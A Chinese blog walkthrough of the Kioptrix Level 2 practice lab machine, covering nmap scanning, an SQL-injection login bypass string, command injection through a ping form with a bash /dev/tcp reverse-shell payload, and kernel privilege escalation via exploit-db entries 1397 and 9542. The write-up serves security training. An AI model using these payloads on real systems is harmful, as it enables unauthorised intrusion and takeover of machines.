Kioptrix Level 2靶机

最新推荐文章于 2025-05-08 20:25:06 发布
最新推荐文章于 2025-05-08 20:25:06 发布
阅读量362 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: OSCP靶机 文章标签: OSCP靶机 渗透测试 网络安全 权限提升 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/godfish44/article/details/145736066

Kioptrix Level 2靶机

一、信息搜集

1.主机发现

namp -sP 192.168.189.129/24 -T5

在这里插入图片描述

2.全端口扫描,服务版本探测

nmap -sS -sV -p- 192.168.189.135

在这里插入图片描述

发现80端口存在http服务,我们尝试访问

在这里插入图片描述

二、漏洞利用

1、万能密码登录

发现一个登陆页面,发现万能密码可以绕过登陆验证

' or 1=1 #

在这里插入图片描述

查看源代码发现html页面不完整:

在这里插入图片描述

我们手动修补后发现了一个ping的功能,且存在命令执行,但是没有找到nc,我们反弹一个bash回来:

在这里插入图片描述

在这里插入图片描述

2、反弹shell

127.0.0.1 | bash -c 'exec bash -i &>/dev/tcp/192.168.189.129/5566 <&1'

在这里插入图片描述

三、后渗透

1.信息搜集

查看内核版本信息,搜索历史漏洞

uname -a
lsb_release -a   # 查看版本信息

在这里插入图片描述

在这里插入图片描述

searchsploit 2.6.9 linux | grep Privilege
searchsploit centos 4.5 | grep Privilege

发现可利用的提权exp:编号1397,9542

在这里插入图片描述

在这里插入图片描述

2.权限提升

[!NOTE]

kali中的gcc版本太高可能无法编译成功,我们可将源码下载到目标机器进行编译

开启微服务:

python -m http.server

/tmp目录有读写执行权限,下载到这个目录

在这里插入图片描述

编译:

gcc -o k-rad3 1397.c -static -O2

执行后提示失败,内核版本不匹配!

我们尝试编号9542:

在这里插入图片描述
提权成功!

Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 965
Kioptrix Level 2靶机wp
【vulnhub——Kioptrix Level 1靶机
jieli0901227的博客
05-26 738
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
Kioptrix_level_2 新手入门攻略
qq_58683895的博客
09-16 312
使用命令注入及漏洞提权攻略靶机,过程较为完整
Kioptrix Level 2入门级详细教程&小白也能看懂!
jockerboss的博客
02-27 1329
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
OSCP备战-kioptrix level _2详细分析
最新发布
2301_81864699的博客
05-08 240
得出目标IP:也可以使用。
vulnhub之Kioptrix Level 2
li1136594919的博客
06-09 553
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机
kioptrix-level2 渗透测试
viki101的博客
09-20 575
3306 (3306/tcp open mysql MySQL (unauthorized))端口,可以利用。开启了80(80/tcp open http Apache httpd 2.0.52 ((CentOS))),一个登录框,看见登录框,就想到了弱口令和sql注入,首先用sql注入万能密码来一波。首先它是一个web控制台,可以ping计算机网络,这就想到了远程命令执行漏洞。根据nmap扫描结果显示,可以发现CentOS,其权限为apache,之后尝试反弹shell。
Kioptrix_Level_2 靶机漏洞复现】
mmdlm的博客
09-11 1114
KioptrixLevel2环境中,通过Nmap扫描发现目标主机,利用命令注入和SQL注入漏洞进行渗透,最终实现反弹shell和提权的过程,包括获取系统信息及本地提权漏洞利用。
渗透测试靶机---Kioptrix Level 2
久恙502的博客
07-19 324
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
Kioptrix Level 4 靶机wp
m0_52496313的博客
08-16 499
Kioptrix Level 4 靶机wp
Kioptrix Level 3 靶机wp
m0_52496313的博客
08-14 458
Kioptrix Level 3 靶机wp
vuInhub靶场实战系列--Kioptrix Level #2
weixin_45221204的博客
06-09 1024
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #2靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、反弹shell、脚本利用、linux内核提权等内容。p=49Checksum主机发现目录扫描端口扫描netcat监听反弹shelllinux内核提权。
黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2
ShadowBlade
08-16 2645
第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 如果靶机部署有疑问,请留言! 1.信息收集 kali IP为192.168.17.4 发现靶机IP192.168.17.5 使用第二章nmap命令扫描靶机, nmap -p `nmap -p- --min-rate=10000 ..
Kioptrix Level 2
2303_76157831的博客
03-31 179
admin后的 ' 使原来的代码中的单引号进行闭合,再拼接 or '1'='1 达到万能密码的作用,“or”代表只要有一个条件为真整个语句就为真 ,我们在“or”后面构造 '1'='1 ,这样即使我们并不知道账号密码,但是“or”后方的 '1'='1 等式恒成立,(因为我们输入的账号为 admin' 已经提前手动闭合 ,所以,在代码中显示的完整版为 'admin' or '1'='1' )
《攻克Kioptrix Level 2OSCP靶机渗透与提权分析》
Xs_20240309的博客
12-10 1348
打开网页,F12,找到原网页源代码Ping a Machine on the Network 右击以html格式修改,将上述代码复制,并将。根据上图版本信息,直接下载33321.c,发现33321.c编译有问题,换到1397.c,下载完编译还是报错,有问题,这条路走不通了。但是这也没啥提示啊,看一波源码是不是有泄露的地方,这里有地方没有闭合,上面代码有传参点会将输入的内容传到。先用arp扫一下,等待靶机开机后,在扫一下,确定192.168.17.177是靶机IP。获取到靶机的ip后,开始对ip的扫描。
vulnhub Kioptrix Level 2通关
2301_80661529的博客
03-29 936
1.总结目前所见的信息收集工具的使用2.sql注入3.Rce4.提权5.反弹shell探勘有权限的目录6.内核提权的步骤。
Oscp备考-Kioptrix2
weixin_44126257的博客
09-16 2101
Oscp备考:Kioptrix Level 2
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1466
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
Kioptrix Level2
底层社会中的弱智
04-16 967
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
VMware安装Kioptrix 4 靶机
01-08
在向导中选择自定义(高级),以便更灵活配置资源分配给 Kioptrix 4 使用[^2]。 #### 资源设置 对于内存大小建议至少给予 512MB RAM;处理器核心数可根据个人电脑性能适当调整,一般单核即可满足需求。存储空间方面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值